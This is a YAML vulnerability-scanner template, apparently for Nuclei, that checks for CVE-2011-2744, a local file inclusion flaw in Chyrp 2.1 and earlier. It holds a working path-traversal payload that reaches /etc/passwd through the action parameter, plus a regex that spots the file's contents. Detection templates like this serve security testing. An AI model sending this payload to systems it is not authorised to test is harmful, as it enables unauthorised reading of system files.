37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
id: CVE-2011-2744
|
|
|
|
info:
|
|
name: Chyrp 2.x - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/35945
|
|
- http://www.openwall.com/lists/oss-security/2011/07/13/6
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2011-2744
|
|
- http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
|
cvss-score: 6.8
|
|
cve-id: CVE-2011-2744
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2011,lfi,chyrp,edb
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|